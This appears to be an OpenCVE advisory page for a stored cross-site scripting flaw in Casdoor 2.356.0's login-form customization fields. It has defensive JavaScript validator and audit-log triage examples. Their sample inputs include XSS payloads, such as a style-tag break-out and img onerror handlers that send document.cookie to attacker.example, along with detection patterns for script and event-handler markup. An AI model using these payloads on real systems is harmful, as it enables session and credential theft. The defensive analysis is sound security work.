Description
A security flaw has been discovered in Casdoor 2.356.0. This affects the function dangerouslySetInnerHTML. Performing a manipulation of the argument formCss/formCssMobile/formSideHtml results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2026-04-03
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑site scripting
Action: Patch Now
AI Analysis

Impact

Casdoor 2.356.0 renders the per-application customization fields formCss, formCssMobile and formSideHtml into the page through React's dangerouslySetInnerHTML, which inserts a string as raw HTML with no escaping or sanitization. Anyone who can set those fields can therefore store a payload that runs in the browser of every user who later loads the affected page: for the CSS fields this is a break-out such as closing the injected style element and opening a script tag, for the side-HTML field it is any scriptable markup. Because these fields customize the application's sign-in form, the injected script executes on the page where users enter their credentials, so beyond the usual stored-XSS outcomes (session or token theft, defacement, forged requests in the victim's session) it can capture credentials as they are typed. The record also lists CWE-94, reflecting that the injected content is executed as code rather than merely displayed.
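To make the mechanism concrete, here is an added example (not Casdoor's own code) that contrasts the vulnerable render shape with a fail-closed validator for the three fields named in the CVE. The function names, the tag and attribute allowlists and the sample payloads are constructed for this illustration; a production fix would sit on the server's write path and would more usually rely on an established sanitizer than on a hand-rolled tokenizer.

```javascript
// Added example, not Casdoor's code: models the vulnerable render and a
// fail-closed validator for formCss / formCssMobile / formSideHtml. Function
// names, allowlists and the sample payloads below are constructed.

// The vulnerable shape: React's dangerouslySetInnerHTML inserts the string
// verbatim, so a "CSS" value can close its <style> element and start a script.
function vulnerableStyleProps(formCss) {
  return { dangerouslySetInnerHTML: { __html: formCss } };
}

// Constructs a login-form style sheet never needs. A literal '<' is what ends
// a raw-text <style> element, so rejecting it blocks the break-out; backslashes
// are rejected because CSS escapes could disguise the other patterns.
const CSS_FORBIDDEN = [
  /</, /\\/, /expression\s*\(/i, /javascript\s*:/i, /-moz-binding/i,
  /behavior\s*:/i, /@import/i,
];

// Accept only plain CSS whose url() references are root-relative, so an
// injected rule cannot exfiltrate page data to an attacker-controlled host.
function validateFormCss(css) {
  for (const re of CSS_FORBIDDEN) {
    if (re.test(css)) return { ok: false, reason: `forbidden construct ${re}` };
  }
  for (const m of css.matchAll(/url\s*\(\s*['"]?\s*([^'")\s]*)/gi)) {
    const target = m[1];
    if (!target.startsWith('/') || target.startsWith('//')) {
      return { ok: false, reason: `url() must be root-relative: ${target}` };
    }
  }
  return { ok: true };
}

// Side HTML: a small allowlist of tags and attributes. Anything the tokenizer
// does not recognise is a rejection, not a strip, so malformed markup that a
// browser would still parse (unclosed tags, comments, tag-splitting tricks)
// never reaches the page.
const HTML_TAGS = new Set(['p', 'div', 'span', 'a', 'img', 'br', 'b', 'i',
  'strong', 'em', 'ul', 'ol', 'li', 'h1', 'h2', 'h3', 'h4']);
const HTML_ATTRS = new Set(['href', 'src', 'alt', 'title', 'class']);
const TAG_RE = /<\/?([a-zA-Z][a-zA-Z0-9-]*)((?:\s+[^\s=>]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s=]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;

function validateFormSideHtml(html) {
  for (const [, name, attrs] of html.matchAll(TAG_RE)) {
    if (!HTML_TAGS.has(name.toLowerCase())) return { ok: false, reason: `tag <${name}>` };
    for (const [, attr, rawValue = ''] of attrs.matchAll(ATTR_RE)) {
      const key = attr.toLowerCase();
      if (!HTML_ATTRS.has(key)) return { ok: false, reason: `attribute ${attr}` };
      const value = rawValue.replace(/^["']|["']$/g, '').trim().toLowerCase();
      if ((key === 'href' || key === 'src') && !/^(https:\/\/|\/(?!\/))/.test(value)) {
        return { ok: false, reason: `${key} must be https:// or root-relative` };
      }
    }
  }
  // Whatever the tokenizer did not consume must contain no '<' at all.
  if (html.replace(TAG_RE, '').includes('<')) {
    return { ok: false, reason: 'unrecognised markup' };
  }
  return { ok: true };
}

// Hardened write path: reject the whole update instead of storing and
// rendering a field that failed validation.
function validateApplicationUpdate(app) {
  const results = {
    formCss: validateFormCss(app.formCss ?? ''),
    formCssMobile: validateFormCss(app.formCssMobile ?? ''),
    formSideHtml: validateFormSideHtml(app.formSideHtml ?? ''),
  };
  const rejected = Object.entries(results)
    .filter(([, r]) => !r.ok)
    .map(([field, r]) => `${field}: ${r.reason}`);
  return { ok: rejected.length === 0, rejected };
}

// Constructed payloads in the shape the CVE describes, and a benign update.
const MALICIOUS_UPDATE = {
  formCss: '.login-form{color:red}</style><script>alert(document.cookie)</script>',
  formCssMobile: 'body{background:url(https://attacker.example/c?d=1)}',
  formSideHtml: '<img src=x onerror="fetch(\'https://attacker.example/\'+document.cookie)">',
};
const BENIGN_UPDATE = {
  formCss: '.login-form{background:url(/static/bg.png);padding:1rem}',
  formCssMobile: '.login-form{padding:0.5rem}',
  formSideHtml: '<div class="promo"><a href="https://example.com/help">Need help?</a><br/></div>',
};

console.log(vulnerableStyleProps(MALICIOUS_UPDATE.formCss)); // payload passed through untouched
console.log(validateApplicationUpdate(MALICIOUS_UPDATE));     // ok: false, three reasons
console.log(validateApplicationUpdate(BENIGN_UPDATE));        // ok: true
```

The design choice worth noting is reject-rather-than-strip: a stripping sanitizer turns `<scr<script>ipt>` into `<script>`, whereas a validator that refuses any markup it cannot fully account for has no such second-order output. The price is that legitimate side HTML must be well-formed and use `&lt;` for a literal less-than sign.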

Affected Systems

The only product listed is Casbin Casdoor, with the CPE cpe:2.3:a:casbin:casdoor:2.356.0 covering release 2.356.0. The record does not identify a fixed version and does not say whether earlier releases share the same rendering path, so adjacent versions should be treated as unverified rather than safe until the vendor confirms a fix. No other vendors or products are listed as affected.

Risk and Exploitability

The CVSS 4.0 score of 5.1 (medium) describes a network-reachable, low-complexity attack that needs an authenticated low-privilege account (PR:L) and a victim who loads the affected page (UI:P); the 3.x vectors score the same profile at 3.5 and the 2.0 vector at 4.0 with single authentication required. The EPSS score below 1% and the SSVC assessment of "Exploitation: none" and "Automatable: no" indicate no observed exploitation so far, but every vector carries E:P and the description states that a proof of concept has been published. The vulnerability is not in the CISA KEV catalog. The practical exposure is that of a stored XSS on an identity provider's sign-in page: an account that can edit these fields plants the payload once, it fires for every subsequent visitor until removed, and the vendor had not responded at the time of disclosure.

Generated by OpenCVE AI on April 9, 2026 at 02:50 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Track the vendor for a release that sanitizes or removes the dangerouslySetInnerHTML rendering of these fields and upgrade when it ships; until then, audit the current values of formCss, formCssMobile and formSideHtml in every application and clear anything you did not set yourself
  • Restrict write access to these settings to trusted administrators, and validate them server-side on every write: the CSS fields must contain no markup at all, and formSideHtml must pass an allowlist check that rejects unrecognised input rather than stripping it
  • Deploy a Content Security Policy whose script-src omits 'unsafe-inline' and 'unsafe-eval'; expect the customization CSS and any React inline styles to need a nonce or hash, and remember that CSP does not stop pure CSS injection from leaking page content
  • Monitor application update requests and audit records for changes to these three fields, alert on new values containing tags, event-handler attributes or javascript: URLs, and review sessions issued after any suspicious change
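As an added example (not Casdoor's code and not its record format), the following triage routine shows the monitoring item above in practice: it walks constructed audit records, diffs the three fields across update-application events, scores changes that introduce markup, and flags edits made by accounts outside an expected-editor allowlist. The JSON line layout, the before/after keys, the action name and the allowlist are assumptions made for this illustration.

```javascript
// Added example, not Casdoor's code or log format: triage of constructed
// application-update audit records for changes to the three fields named in
// the CVE. The record shape, the 'update-application' action name and the
// expected-editor allowlist are assumptions for this illustration.

const WATCHED_FIELDS = ['formCss', 'formCssMobile', 'formSideHtml'];

// Indicators that a customization value now carries markup or script rather
// than the CSS or static HTML the field is meant to hold.
const INDICATORS = [
  ['style-breakout', /<\/style/i],
  ['script-tag', /<script/i],
  ['event-handler', /\son[a-z]+\s*=/i],
  ['javascript-url', /javascript\s*:/i],
  ['external-url()', /url\s*\(\s*['"]?\s*(?:https?:)?\/\//i],
  ['active-element', /<(svg|iframe|object|embed)/i],
];

function indicatorsFor(field, value) {
  const hits = INDICATORS.filter(([, re]) => re.test(value)).map(([name]) => name);
  // A CSS field has no business containing any tag at all.
  if (field !== 'formSideHtml' && value.includes('<')) hits.push('markup-in-css');
  return hits;
}

// lines: JSON-lines audit records; expectedEditors: Set of account names that
// are allowed to touch these settings. Returns one alert per changed field.
function triage(lines, expectedEditors) {
  const alerts = [];
  for (const line of lines) {
    let rec;
    try { rec = JSON.parse(line); } catch { continue; } // skip malformed lines
    if (rec.action !== 'update-application') continue;
    for (const field of WATCHED_FIELDS) {
      const before = rec.before?.[field] ?? '';
      const after = rec.after?.[field] ?? '';
      if (before === after) continue;
      const hits = indicatorsFor(field, after);
      const unexpectedEditor = !expectedEditors.has(rec.user);
      if (hits.length === 0 && !unexpectedEditor) continue;
      alerts.push({
        ts: rec.ts, user: rec.user, app: rec.app, field,
        severity: hits.length ? 'high' : 'medium',
        indicators: hits, unexpectedEditor,
        snippet: after.slice(0, 80),
      });
    }
  }
  return alerts;
}

// Constructed audit lines: a benign admin edit, a stored-XSS edit by an
// unexpected account, a style-breakout by the admin, a benign edit by the
// unexpected account, an unrelated action and one corrupt line.
const SAMPLE_LOG = [
  JSON.stringify({ ts: '2026-04-04T09:12:03Z', user: 'admin/alice', action: 'update-application',
    app: 'built-in/app-portal', before: { formCss: '' }, after: { formCss: '.login-form{padding:1rem}' } }),
  JSON.stringify({ ts: '2026-04-04T09:40:11Z', user: 'built-in/mallory', action: 'update-application',
    app: 'built-in/app-portal', before: { formSideHtml: '<p>Welcome</p>' },
    after: { formSideHtml: '<p>Welcome</p><img src=x onerror="new Image().src=\'https://attacker.example/?c=\'+document.cookie">' } }),
  JSON.stringify({ ts: '2026-04-04T10:02:45Z', user: 'admin/alice', action: 'update-application',
    app: 'built-in/app-portal', before: { formCssMobile: '' },
    after: { formCssMobile: '.login-form{color:#333}</style><script>alert(1)</script>' } }),
  JSON.stringify({ ts: '2026-04-04T10:15:00Z', user: 'built-in/mallory', action: 'update-application',
    app: 'built-in/app-portal', before: { formCss: '.login-form{padding:1rem}' }, after: { formCss: '.login-form{padding:2rem}' } }),
  JSON.stringify({ ts: '2026-04-04T10:20:00Z', user: 'admin/alice', action: 'update-user', app: 'built-in/app-portal' }),
  'this line is not JSON',
];
const EXPECTED_EDITORS = new Set(['admin/alice']);

console.log(triage(SAMPLE_LOG, EXPECTED_EDITORS)); // three alerts: high, high, medium
```

The second and third records show why editor identity alone is not a sufficient signal: the break-out in the third line was made by the expected administrator, which is exactly what a compromised admin session or a CSRF'd admin would look like, so the content check has to run regardless of who made the change.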


Advisories

No advisories yet.

History

Thu, 09 Apr 2026 01:00:00 +0000

  Type    Values Removed    Values Added
  CPEs    -                 cpe:2.3:a:casbin:casdoor:2.356.0:*:*:*:*:*:*:*

Tue, 07 Apr 2026 00:00:00 +0000

  Type                   Values Removed    Values Added
  First Time appeared    -                 Casbin
                                           Casbin casdoor
  Vendors & Products     -                 Casbin
                                           Casbin casdoor

Fri, 03 Apr 2026 16:30:00 +0000

  Type       Values Removed    Values Added
  Metrics    -                 ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 03 Apr 2026 14:00:00 +0000

  Type           Values Removed    Values Added
  Description    -                 A security flaw has been discovered in Casdoor 2.356.0. This affects the function dangerouslySetInnerHTML. Performing a manipulation of the argument formCss/formCssMobile/formSideHtml results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
  Title          -                 Casdoor dangerouslySetInnerHTML cross site scripting
  Weaknesses     -                 CWE-79
                                   CWE-94
  References     -                 -
  Metrics        -                 cvssV2_0: {'score': 4, 'vector': 'AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:ND/RC:UR'}
                                   cvssV3_0: {'score': 3.5, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}
                                   cvssV3_1: {'score': 3.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}
                                   cvssV4_0: {'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P'}

MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-04-03T15:20:10.722Z

Reserved: 2026-04-03T07:25:58.219Z

Link: CVE-2026-5468

Vulnrichment

Updated: 2026-04-03T15:20:06.911Z

NVD

Status : Analyzed

Published: 2026-04-03T14:16:33.837

Modified: 2026-04-09T00:57:43.527

Link: CVE-2026-5468

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-09T08:29:16Z

Weaknesses